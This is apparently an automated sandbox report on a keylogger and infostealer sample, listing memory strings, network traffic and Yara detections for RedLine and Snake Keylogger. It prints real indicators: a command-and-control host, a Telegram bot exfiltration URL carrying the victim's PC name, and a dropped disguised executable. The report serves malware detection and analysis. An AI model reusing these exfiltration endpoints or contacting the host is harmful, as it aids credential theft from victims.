        Source: svchost.exe, 00000008.00000002.33975648249.0000000007D00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005701000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://varders.kozow.com:8081
        Source: svchost.exe, 00000008.00000002.33975648249.0000000007D00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.quovadis.bm0
        Source: svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org
        Source: svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
        Source: svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
        Source: svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:364339%0D%0ADate%20a
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://c2rsetup.officeapps.live.com/c2r/download.aspx?productReleaseID=HomeBusiness2019Retail&platf
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://cdn.stubdownloader.services.mozilla.com/builds/firefox-latest-ssl/en-GB/win64/b5110ff5d41570
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058C6000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000058B1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://chrome.google.com/webstore?hl=en
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.google.com/tag/s/appguid%3D%7B8A69D345-D564-463C-AFF1-A69D9E530F96%7D%26iid%3D%7B9AB9339B
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://dl.packetstormsecurity.net/Crackers/bios/BIOS320.EXE
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://download.mozilla.org/?product=firefox-latest-ssl&os=win64&lang=en-GB&attribution_code=c291cm
        Source: svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab0
        Source: svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://eicar.org/
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://javadl.oracle.com/webapps/download/AutoDL?BundleId=245029_d3c52aa6bfa54d3ca74e617f18309292K
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005969000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005975000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005969000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com//
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005969000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005975000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/v104
        Source: svchost.exe, 00000008.00000002.33975648249.0000000007D00000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ocsp.quovadisoffshore.com0
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/22459/BIOS320.EXE.html
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/files/download/22459/BIOS320.EXE
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://packetstormsecurity.com/https://packetstormsecurity.com/files/download/22459/BIOS320.EXEhttp
        Source: svchost.exe, 00000008.00000002.33970405843.00000000057C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005753000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005753000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, svchost.exe, 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/
        Source: svchost.exe, 00000008.00000002.33970405843.000000000577D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/154.16.192.225
        Source: svchost.exe, 00000008.00000002.33970405843.00000000057C2000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.00000000057E9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.000000000577D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://reallyfreegeoip.org/xml/154.16.192.225$
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://sdlc-esd.oracle.com/ESD6/JSCDL/jdk/8u301-b09/d3c52aa6bfa54d3ca74e617f18309292/JavaSetup8u301
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.000000000580D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B78000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006818000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.000000000580D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000683D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txt/
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com.txtD
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000683D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com/
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B78000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006818000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://secure.eicar.org/eicar.com;
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://stubdownloader.services.mozilla.com/?attribution_code=c291cmNlPXd3dy5nb29nbGUuY29tJm1lZGl1bT
        Source: svchost.exe, 00000008.00000002.33970405843.0000000005A32000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33970405843.0000000005977000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.google.com/chrome/?p=plugin_flash
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/favicon.icohttps://uk.search.yahoo.com/search
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://uk.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/cgi-bin/getfile.pl?autoit3/autoit-v3-setup.exe
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/files/autoit3/autoit-v3-setup.exeQ
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.autoitscript.com/site/autoit/downloads/https://www.autoitscript.com/site/autoit/download
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B78000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006818000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/:
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006801000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B60000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000683D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/download-anti-malware-testfile/Download
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.eicar.org/https://eicar.org/https://www.eicar.org/download-anti-malware-testfile/https:/
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-na-us-chrome-bubble&utm_
        Source: svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/chrome/next-steps.html?brand=CHWL&statcb=0&installdataindex=empty&defaultbrow
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/https://www.google.com/chrome/?&brand=CHWL&utm_campaign=en&utm_source=en-et-n
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006959000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000067B4000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006A44000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
        Source: svchost.exe, 00000008.00000002.33972714718.00000000068A9000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006873000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B2A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068C0000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006AF4000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/search?q=eicar
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-release
        Source: svchost.exe, 00000008.00000002.33972714718.0000000006B0A000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006853000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.00000000068B5000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.000000000680D000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.33972714718.0000000006B6C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/all/#product-desktop-releasehttps://www.mozilla.org/en-GB/fire
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.org/en-GB/firefox/windows/
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/
        Source: svchost.exe, 00000008.00000002.33970405843.00000000058F2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.office.com/lB5r
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
        Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
        Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
        Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
        Source: unknownHTTPS traffic detected: 149.154.167.220:443 -> 192.168.11.20:49807 version: TLS 1.2

        System Summary

        barindex
        Malicious sample detected (through community Yara rule)
        Source: 00000007.00000002.31560050751.0000000003570000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 00000008.00000002.33967794321.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
        Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000008.00000002.33976137642.0000000007F40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 00000008.00000002.33972714718.000000000677D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000008.00000002.33976502729.0000000007FE0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects executables with potential process hoocking Author: ditekSHen
        Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
        Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Source: Process Memory Space: svchost.exe PID: 8376, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 Author: unknown
        Powershell drops PE file
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: \Device\CdRom0\9236-pagaconferma-jpg.exeJump to dropped file
        Source: unknownDriver loaded: C:\Windows\System32\drivers\udfs.sys
